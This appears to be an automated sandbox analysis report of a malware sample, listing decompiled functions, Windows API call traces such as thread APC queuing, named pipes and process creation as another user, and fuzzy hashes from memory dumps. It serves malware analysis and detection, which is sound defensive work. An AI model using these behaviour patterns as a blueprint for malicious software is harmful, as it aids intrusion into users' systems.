Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Query$lstrcpylstrlen
String ID: a"w
API String ID: 3961825720-3750222522
Opcode ID: 781057b8ea6871b1064986309caf8bbd9a617c00b4a2c49415828448b9fc143a
Instruction ID: 0986071ccd6ca6fc67ea5f439b0440f5e26e631602a7451870bd189af16f744c
Opcode Fuzzy Hash: 781057b8ea6871b1064986309caf8bbd9a617c00b4a2c49415828448b9fc143a
Instruction Fuzzy Hash: 62416C72500209EFEF118F98CD88EAEBBB9EF04351F408069F909A7260DB79DE55DB50

Uniqueness

Uniqueness Score: -1.00%

Function 007523FC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0075241E

Part of subcall function 007684EA: RtlNtStatusToDosError.NTDLL(00000000), ref: 00768522
Part of subcall function 007684EA: SetLastError.KERNEL32(00000000,?,?,?,00752446), ref: 00768529

GetLastError.KERNEL32(?,00000000,?,00000318,00000020,?,00010003), ref: 0075252E

Part of subcall function 00754153: RtlNtStatusToDosError.NTDLL(00000000), ref: 0075416B

memcpy.NTDLL(?,00772580,00000100,?,00010003), ref: 007524AD
RtlNtStatusToDosError.NTDLL(00000000), ref: 00752507

Strings

, xrefs: 00752474

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: 4dda729a8a230809f2834c7fa7f404dee42dbc44a4d438fc346a2e67b052c7eb
Instruction ID: ef6785eb991117628ccf0eba4b98ec2b22cd9022b9a7f2b8803fd7c40fd058b9
Opcode Fuzzy Hash: 4dda729a8a230809f2834c7fa7f404dee42dbc44a4d438fc346a2e67b052c7eb
Instruction Fuzzy Hash: D731B371900209EBDB20CF64DD98ADAB7B8FF15345F1045BAE806D7241EB78EE59CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0075579B Relevance: 7.9, APIs: 6, Instructions: 401COMMON

Download Yara Rule

APIs

Part of subcall function 00768854: memset.NTDLL ref: 00768874

Part of subcall function 00768854: memset.NTDLL ref: 007689A9
Part of subcall function 00768854: memset.NTDLL ref: 007689BE

memcpy.NTDLL(?,?,0000011E), ref: 00755821
memset.NTDLL ref: 00755857
memset.NTDLL ref: 007558A5
memset.NTDLL ref: 00755924
memset.NTDLL ref: 00755993
memset.NTDLL ref: 00755A63

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 4c2c08fa7dd600137f2ddeefa23d545c12a53391e40ff576137073fafd3efeff
Instruction ID: 364e068005b6725892200c3d13342fe2e1b62543422a8a88b1b12445f894051a
Opcode Fuzzy Hash: 4c2c08fa7dd600137f2ddeefa23d545c12a53391e40ff576137073fafd3efeff
Instruction Fuzzy Hash: F3F1E370500B99CFCB31CF69C5A86EABBF0FF51301F24496DC9D796642E279AA49CB10

Uniqueness

Uniqueness Score: -1.00%

Function 007684EA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 00768522
SetLastError.KERNEL32(00000000,?,?,?,00752446), ref: 00768529

Strings

F$u, xrefs: 00768507, 0076850A
F$u, xrefs: 00768511

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$LastStatus
String ID: F$u$F$u
API String ID: 4076355890-2641894060
Opcode ID: 82209a232b0c035cb9b29c965d850f3a3605abc1ccb01486015c8d8f7d4b1c2c
Instruction ID: 2ad48d2e5c6e1fa6e4a55f2796d5ee8727be16343c13b9ab935b353fa4605acc
Opcode Fuzzy Hash: 82209a232b0c035cb9b29c965d850f3a3605abc1ccb01486015c8d8f7d4b1c2c
Instruction Fuzzy Hash: 0AF0FE71511309FBEB05CB94ED09BEEB7BCAB14345F104158A605A6080EBB8EB54DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0076D4C8 Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,00778208,00000001), ref: 0076D4EC
GetLastError.KERNEL32(?,00000000,?,?,0075DA8B,?,?,?), ref: 0076D537

Part of subcall function 00762DF0: CreateThread.KERNEL32(00000000,00000000,00000000,?,00778194,0075678D), ref: 00762E07
Part of subcall function 00762DF0: QueueUserAPC.KERNEL32(?,00000000,?), ref: 00762E1C
Part of subcall function 00762DF0: GetLastError.KERNEL32(00000000), ref: 00762E27
Part of subcall function 00762DF0: TerminateThread.KERNEL32(00000000,00000000), ref: 00762E31
Part of subcall function 00762DF0: CloseHandle.KERNEL32(00000000), ref: 00762E38
Part of subcall function 00762DF0: SetLastError.KERNEL32(00000000), ref: 00762E41

GetLastError.KERNEL32(0076C75F,00000000,00000000,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076D51F
CloseHandle.KERNEL32(00000000,?,00000000,?,?,0075DA8B,?,?,?), ref: 0076D52F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: fd88a2d139bdbe5497b8d92131dcecf4980cf1c953e01f48ee3984cb516008f1
Instruction ID: f92ca6a119496bf4808d8c659b45324029c65eef038d397c1ecdd951972bbbba
Opcode Fuzzy Hash: fd88a2d139bdbe5497b8d92131dcecf4980cf1c953e01f48ee3984cb516008f1
Instruction Fuzzy Hash: D5F0F4B1344241AFE3601B68EC4CE373758EB453B9B104634FA6BC26D1DA784C52D669

Uniqueness

Uniqueness Score: -1.00%

Function 004019F9 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004019F9() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x404170;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40417c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x40416c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404168 = _t5;
						 *0x404170 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404164 = _t6;
						if(_t6 == 0) {
							 *0x404164 =  *0x404164 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x004019fa
0x00401a08
0x00401a0e
0x00401a15
0x00401a6c
0x00401a6c
0x00401a17
0x00401a1f
0x00401a2c
0x00401a2c
0x00401a68
0x00401a6a
0x00000000
0x00000000
0x00000000
0x00401a21
0x00401a28
0x00401a2e
0x00401a2e
0x00401a33
0x00401a41
0x00401a46
0x00401a4c
0x00401a52
0x00401a59
0x00401a5b
0x00401a5b
0x00401a65
0x00401a2a
0x00401a2a
0x00000000
0x00401a2a
0x00401a28

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040167E), ref: 00401A08
GetVersion.KERNEL32 ref: 00401A17
GetCurrentProcessId.KERNEL32 ref: 00401A33
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401A4C

Memory Dump Source

Source File: 00000000.00000002.496058515.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.496020700.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496068804.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496077898.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.496085963.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Lx6.jbxd

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 50bb23a1db3729665d8e66bb47fe360ed722caceda08416a40356b99959d9be9
Instruction ID: 7a5b021ba2c54ba7171dc776195aa8702d679d154871c4540c647a73e625d25e
Opcode Fuzzy Hash: 50bb23a1db3729665d8e66bb47fe360ed722caceda08416a40356b99959d9be9
Instruction Fuzzy Hash: 5DF03CB1B423019BEB509F78BE09B563FA4A795712F004136E601FA2F4E7748A81CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00753F26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 00753F53
SetLastError.KERNEL32(00000000,?,?,007524E8,?,00000000,?,00000318,00000020,?,00010003), ref: 00753F5A

Strings

$u, xrefs: 00753F35

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$LastStatus
String ID: $u
API String ID: 4076355890-901181577
Opcode ID: f0c6598de2b677e1b2280dc39d2936f331f3f0f54fb7aa965ff153839bf4ceb6
Instruction ID: d071ee0380b33d3c72120b1a72ebb9c2f07bf1bf5c6b9ed14f95ac83b5fbfff2
Opcode Fuzzy Hash: f0c6598de2b677e1b2280dc39d2936f331f3f0f54fb7aa965ff153839bf4ceb6
Instruction Fuzzy Hash: 08E09A3260526AABDF015FE89C08D9A7B69EB08BD1B008021BE05D2171C679DA61ABA4

Uniqueness

Uniqueness Score: -1.00%

Function 0077115B Relevance: 4.9, APIs: 2, Strings: 1, Instructions: 416COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00771535
memset.NTDLL ref: 00771544

Part of subcall function 00753F67: memset.NTDLL ref: 00753F78
Part of subcall function 00753F67: memset.NTDLL ref: 00753F84
Part of subcall function 00753F67: memset.NTDLL ref: 00753FAF

Strings

Xdv, xrefs: 007713DA, 007712E3

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memset
String ID: Xdv
API String ID: 2221118986-622451888
Opcode ID: 65c8564b85ebde1502b7c0c568ecf2b3cc72cd5032bd837805efe6609db1b844
Instruction ID: 184290f40ebd057fd361d721e2bbf7a006b8886437e13e129730792ab410640d
Opcode Fuzzy Hash: 65c8564b85ebde1502b7c0c568ecf2b3cc72cd5032bd837805efe6609db1b844
Instruction Fuzzy Hash: 0D021170601B618FCB79CF29C680566B7F0BF557507A08A2EC6EB86E91E235F885CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00752BC2 Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON

Download Yara Rule

APIs

NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 00752BD6
GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 00752C16
RtlNtStatusToDosError.NTDLL(00000000), ref: 00752C1F

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$InformationLastQueryStatusThread
String ID:
API String ID: 2450163249-0
Opcode ID: d89c27d8d93fb7d9d3c9425da38d34d259db4e6ab389c7aa334389aa14a2b58b
Instruction ID: 68862e75f90fef4ba02cb5d7c566f8346f450ea13dc8cdd6a38deea347a7f66c
Opcode Fuzzy Hash: d89c27d8d93fb7d9d3c9425da38d34d259db4e6ab389c7aa334389aa14a2b58b
Instruction Fuzzy Hash: 96016275A00108FFEB119B95DD09DEEBBBDFB84741F100425FD41E2062E7B9DA499B60

Uniqueness

Uniqueness Score: -1.00%

Function 00757003 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 611COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0075769F

Strings

)Jv, xrefs: 00757006

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memset
String ID: )Jv
API String ID: 2221118986-2066601979
Opcode ID: 00b3eca40527c910c4a47c5fbe01e5de2ebec3ef95cef3c6c6eeaa4c65f82de2
Instruction ID: bbdc2acbb420a8ad275d02a4e25c78888a23df5a32e6c05e1f451b8a100e2952
Opcode Fuzzy Hash: 00b3eca40527c910c4a47c5fbe01e5de2ebec3ef95cef3c6c6eeaa4c65f82de2
Instruction Fuzzy Hash: 6B22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 00765CFD Relevance: 3.1, Strings: 2, Instructions: 575COMMON

Download Yara Rule

Strings

ew, xrefs: 007663E7
, xrefs: 00766066

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID:
String ID: $ew
API String ID: 0-2030876269
Opcode ID: 986ac281f47a386345fb78ac729884f439b4b4a1f6b5fbefd0d94f76220546c5
Instruction ID: f5775877269bfbb9f7fa3b0399a1db23bd09799c8cd3f3850005aa3da1434c78
Opcode Fuzzy Hash: 986ac281f47a386345fb78ac729884f439b4b4a1f6b5fbefd0d94f76220546c5
Instruction Fuzzy Hash: 05429270A00B458FCB29CF69C4806AAFBF1FF59304F54856ED8879B752D738A986CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0076E897 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 0076E8C8
RtlNtStatusToDosError.NTDLL(C000009A), ref: 0076E8FF

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapInformationQueryStatusSystem
String ID:
API String ID: 2533303245-0
Opcode ID: a589ac7a9d071a46ad69142700161cb96d8ff5222b47d36c5c04303814a9b987
Instruction ID: c52fdf277e33f35cfef2fe573b12185259b2702b709baabf50cc0665d5aa943d
Opcode Fuzzy Hash: a589ac7a9d071a46ad69142700161cb96d8ff5222b47d36c5c04303814a9b987
Instruction Fuzzy Hash: A701F93B902236FBD7215A54CD08AAFBA29AF95B90F155124FD06A3110E73C8E01A7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00754A69 Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00754A88
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00754AA0

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: InformationProcessQuerymemset
String ID:
API String ID: 2040988606-0
Opcode ID: 3cd9738713a6a2db60d1aee448d9b663f0542d36acbac441ec6d494d9ac4ac81
Instruction ID: f401c5c36e87419475c7c7b56b17799e6330f4c0060f6601a844f8fd54a472bd
Opcode Fuzzy Hash: 3cd9738713a6a2db60d1aee448d9b663f0542d36acbac441ec6d494d9ac4ac81
Instruction Fuzzy Hash: D2F0127694021CBAEB60DB91DC49FDE7B7DEB04780F048161BE08E6191E774DF988BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0075BF83 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(C0000002), ref: 0075BFB0
SetLastError.KERNEL32(00000000,?,?,00752BF4,?,?,?,0000001C,?), ref: 0075BFB7

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Error$LastStatus
String ID:
API String ID: 4076355890-0
Opcode ID: 398207daf3167f67539785f6f35d7c0c4a0518a58e567641dc64c46a08363877
Instruction ID: a3a89bfd4a8eab0367010731e6da2118d8046fa4f77bed032594dc749efd25a1
Opcode Fuzzy Hash: 398207daf3167f67539785f6f35d7c0c4a0518a58e567641dc64c46a08363877
Instruction Fuzzy Hash: 73E04F3220522ABBCF015FE8DC08DDB7B69FB08782B008020BE05C2130CB79D970ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 0075C875 Relevance: 1.5, APIs: 1, Instructions: 38processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0075C8AF

Part of subcall function 007633D7: ResumeThread.KERNEL32(00000004,?,00754074,?), ref: 007633EC

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CreateProcessResumeThreadUser
String ID:
API String ID: 3393100766-0
Opcode ID: a4b1c1f86c29940c45dc54b81cfb9092c322a2e834d8e092dc5768af9c817629
Instruction ID: 1a18a8a27cce777b171f5a1b73faf930aa7fa7cd5472348b8fb5e2c408c0449d
Opcode Fuzzy Hash: a4b1c1f86c29940c45dc54b81cfb9092c322a2e834d8e092dc5768af9c817629
Instruction Fuzzy Hash: 6EF0F932215249AFDF024F99DC41CDA7F6AFF49374B054225FE1992120C776DC22DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0076BB1B Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0076BB32

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e2cf566e3d2f42aea2ab674cba79848ccfad93d8f2118e684adcbabc9c787650
Instruction ID: 13676a51ab25a171fd584ecb31f355ba14e7be6523a49a39eeaa94792c228a38
Opcode Fuzzy Hash: e2cf566e3d2f42aea2ab674cba79848ccfad93d8f2118e684adcbabc9c787650
Instruction Fuzzy Hash: 91D0127260012877DB109E95DC45DDB7F6CDB05690F008121BD05E7154D634EA85D7E4

Uniqueness

Uniqueness Score: -1.00%

Function 0077027B Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(69B25F44,00000025,?,00000030,69B25F44), ref: 00770290

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 6479de47143fe1e8c8ad138b16bd3ab32c08c7890fd5b54a8521be6c283fdc20
Instruction ID: 00abbaba17bf1835c2a58f31b9f3d0032d5938549061446de665cb4f14562a8e
Opcode Fuzzy Hash: 6479de47143fe1e8c8ad138b16bd3ab32c08c7890fd5b54a8521be6c283fdc20
Instruction Fuzzy Hash: 9DD01771221109BBEB00DBA0DC49EAA77ADAB14784F108020BE09E5091E674DA5596A4

Uniqueness

Uniqueness Score: -1.00%

Function 00754153 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

RtlNtStatusToDosError.NTDLL(00000000), ref: 0075416B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: 1b5f1112b1537fb368b943ea4ffacbe656f78f07dd0071c42fbb71159b74fbae
Instruction ID: 9c2a69410500a383a74943e011ee632f7fd8929893f7612a40e11cc95c03c15f
Opcode Fuzzy Hash: 1b5f1112b1537fb368b943ea4ffacbe656f78f07dd0071c42fbb71159b74fbae
Instruction Fuzzy Hash: 13C012365052027BDE095750DC2892A7A51BB50341F00841CB54D80070C778D8D0D700

Uniqueness

Uniqueness Score: -1.00%

Function 00772AC4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction ID: 84c1733aacd6c6fd6a217c1325305abae4da15b094cb74f88caa5037c1207beb
Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
Instruction Fuzzy Hash: F421C9729002049BCB10DF68C8C4967B7A5FF443A0B05C468EC6D8B256EB34F916CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 007623C9 Relevance: 68.7, APIs: 38, Strings: 1, Instructions: 440synchronizationtimethreadCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00777B20,00777070,00000010), ref: 00762422

Part of subcall function 0076853A: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?,?,?,?), ref: 0076856E
Part of subcall function 0076853A: GetLastError.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 0076862F
Part of subcall function 0076853A: ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?), ref: 00768638

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 0076247B

Part of subcall function 0076BF9A: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0076BFB4
Part of subcall function 0076BF9A: CreateWaitableTimerA.KERNEL32(00778208,00000003,?), ref: 0076BFD1
Part of subcall function 0076BF9A: GetLastError.KERNEL32(?,?,007685A2,?,?,?,00000000,?,?,?,?,?,?), ref: 0076BFE2
Part of subcall function 0076BF9A: GetSystemTimeAsFileTime.KERNEL32(?,00000000,007685A2,?,?,?,007685A2,?), ref: 0076C022
Part of subcall function 0076BF9A: SetWaitableTimer.KERNEL32(00000000,007685A2,00000000,00000000,00000000,00000000,?,?,007685A2,?), ref: 0076C041
Part of subcall function 0076BF9A: HeapFree.KERNEL32(00000000,007685A2,00000000,007685A2,?,?,?,007685A2,?), ref: 0076C057

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 007624CC
StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000,00000000,00000000), ref: 00762548
StrTrimA.SHLWAPI(00000000,?), ref: 0076256A
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 007625AA

Part of subcall function 00768EFC: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 00768F20
Part of subcall function 00768EFC: wsprintfA.USER32 ref: 00768F84

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 00762642
CloseHandle.KERNEL32(?), ref: 00762914

Part of subcall function 0077036C: WaitForSingleObject.KERNEL32(d&v,00000000,00000000,?,?,?,00762664,?), ref: 00770378
Part of subcall function 0077036C: HeapFree.KERNEL32(00000000,?,?,?,?,?,00762664,?), ref: 007703A6
Part of subcall function 0077036C: ResetEvent.KERNEL32(?,?,?,?,00762664,?), ref: 007703C0

WaitForSingleObject.KERNEL32(?,00000000,?), ref: 00762677
WaitForSingleObject.KERNEL32(?,00000000), ref: 00762696
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 007626C7
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 007626E1
_allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 0076272C
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 00762746
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0076275C
ReleaseMutex.KERNEL32(?), ref: 00762779
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000), ref: 0076279A
WaitForSingleObject.KERNEL32(?,00000000), ref: 007627B6
WaitForSingleObject.KERNEL32(?,00000000), ref: 007627C5
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 007627F9
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00762813
SwitchToThread.KERNEL32 ref: 00762815
ReleaseMutex.KERNEL32(?), ref: 0076281F
WaitForSingleObject.KERNEL32(?,00000000), ref: 0076285D
WaitForSingleObject.KERNEL32(?,00000000), ref: 00762868
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 0076288B
SetWaitableTimer.KERNEL32(000000FF,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 007628A5
SwitchToThread.KERNEL32 ref: 007628A7
ReleaseMutex.KERNEL32(?), ref: 007628B1
WaitForSingleObject.KERNEL32(?,00000000), ref: 007628C6
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00762928
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00762934
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00762940
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0076294C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00762958
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00762964
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00762970
RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0076297F

Strings

F$w, xrefs: 00762633

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Wait$CloseHandleObjectSingleTimerWaitable$MultipleObjects$MutexRelease_allmul$Thread$CreateErrorEventFreeHeapLastSwitchTime$ExitFileOpenResetSystemTrimUserVersionmemcpywsprintf
String ID: F$w
API String ID: 3357059880-3034525017
Opcode ID: 0392e6a425623398609a1399c9f5037bf3db232214bdeff6ce1141f0978a32f3
Instruction ID: e5b044a96ebd763404d853600bc12072a78c32fdd75d64caf42370cff16a9fc6
Opcode Fuzzy Hash: 0392e6a425623398609a1399c9f5037bf3db232214bdeff6ce1141f0978a32f3
Instruction Fuzzy Hash: 19F1C571508345EFD751AF64CC84D6BBBE8FB84394F008A2DF99AA21A1D7389D85CF12

Uniqueness

Uniqueness Score: -1.00%

Function 0076E5B7 Relevance: 40.7, APIs: 27, Instructions: 225memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,00000000), ref: 0076E5D4
GetTickCount.KERNEL32 ref: 0076E5ED
wsprintfA.USER32 ref: 0076E640
QueryPerformanceFrequency.KERNEL32(?), ref: 0076E64B
QueryPerformanceCounter.KERNEL32(?), ref: 0076E655
_aulldiv.NTDLL(?,?,?,?), ref: 0076E667
wsprintfA.USER32 ref: 0076E67D
wsprintfA.USER32 ref: 0076E697
wsprintfA.USER32 ref: 0076E6BB
HeapFree.KERNEL32(00000000,?), ref: 0076E6CD
wsprintfA.USER32 ref: 0076E6F0
HeapFree.KERNEL32(00000000,?), ref: 0076E702
wsprintfA.USER32 ref: 0076E73A
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0076E756
GetTickCount.KERNEL32 ref: 0076E766
RtlEnterCriticalSection.NTDLL(03F0C2D0), ref: 0076E77A
RtlLeaveCriticalSection.NTDLL(03F0C2D0), ref: 0076E798

